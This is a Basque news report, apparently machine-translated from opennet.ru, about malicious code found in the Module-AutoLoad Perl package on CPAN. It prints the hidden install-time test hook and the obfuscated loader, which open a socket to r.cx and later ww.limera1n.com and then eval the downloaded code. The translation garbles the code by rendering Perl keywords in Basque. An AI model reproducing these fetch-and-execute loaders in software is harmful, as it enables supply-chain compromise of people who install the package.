Kode gaiztoa detektatu da Module-AutoLoad Perl paketean

CPAN direktorioaren bidez banatutako Perl pakete batean Modulua-Autoload, CPAN moduluak hegaldian automatikoki kargatzeko diseinatua, identifikatu kode gaiztoa. Txertaketa gaiztoa zen aurkituta proba kodean 05_rcx.t, 2011tik bidaltzen ari dena.
Azpimarratzekoa da zalantzazko kodea kargatzeari buruzko galderak sortu zirela StackOverflow 2016an bueltan.

Asmo txarreko jarduerak hirugarrenen zerbitzari batetik (http://r.cx:1/) kodea deskargatu eta exekutatzeko saiakeran datza, modulua instalatzean abiarazitako proba-multzo baten exekuzioan. Uste da hasiera batean kanpoko zerbitzaritik deskargatutako kodea ez zela gaiztoa izan, baina orain eskaera ww.limera1n.com domeinura birbideratzen da, exekuziorako bere kodearen zatia ematen duena.

Deskarga fitxategi batean antolatzeko 05_rcx.t Kode hau erabiltzen da:

nire $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
nire $saiatu = `$^X $prog`;

Zehaztutako kodeak scripta exekutatzea eragiten du ../contrib/RCX.pl, zeinaren edukia lerrora murriztuta:

erabili lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1β€³};

Script hau kargatzen da nahasi zerbitzua erabiliz perlobfuscator.com r.cx kanpoko ostalariaren kodea (82.46.99.88 karaktere kodeak "R.cX" testuari dagozkio) eta eval blokean exekutatzen du.

$ perl -MIO::Socket -e'$b=berria IO::Socket::INET 82.46.99.88.":1β€³; inprimatu <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

Despaketatu ondoren, azkenik, honako hau exekutatzen da: kodea:

inprimatu{$b=new IO::Socket::INET"ww.limera1n.com:80β€³}"GET /iJailBreak
";evalor return warn$@while$b;1

Pakete arazotsua biltegitik kendu da. Eten (Perl Authors Upload Server), eta moduluaren egilearen kontua blokeatuta dago. Kasu honetan, modulua oraindik geratzen da eskuragarri MetaCPAN artxiboan eta MetaCPANetik zuzenean instalatu daiteke cpanminus bezalako utilitate batzuk erabiliz. Adierazi egiten dapaketea ez zela asko banatuta.

Interesgarria eztabaidatzeko konektatuta eta moduluaren egileak, bere gunea "r.cx" hackeatu ostean kode gaiztoa txertatu zelako informazioa ukatu zuen eta ondo pasatzen ari zela azaldu zuen, eta perlobfuscator.com erabili zuen zerbait ez ezkutatzeko, tamaina murrizteko baizik. kodearen eta arbelaren bidez kopiatzea erraztuz. "botstrap" funtzioaren izena aukeratzea hitz honek "bot bezalakoa da eta bootstrap baino laburragoa da". Moduluaren egileak ere ziurtatu du identifikatutako manipulazioek ez dutela ekintza maltzurrik egiten, baizik eta kodea TCP bidez kargatu eta exekutatzen dela frogatzen dutela.

Iturria: opennet.ru

Gehitu iruzkin berria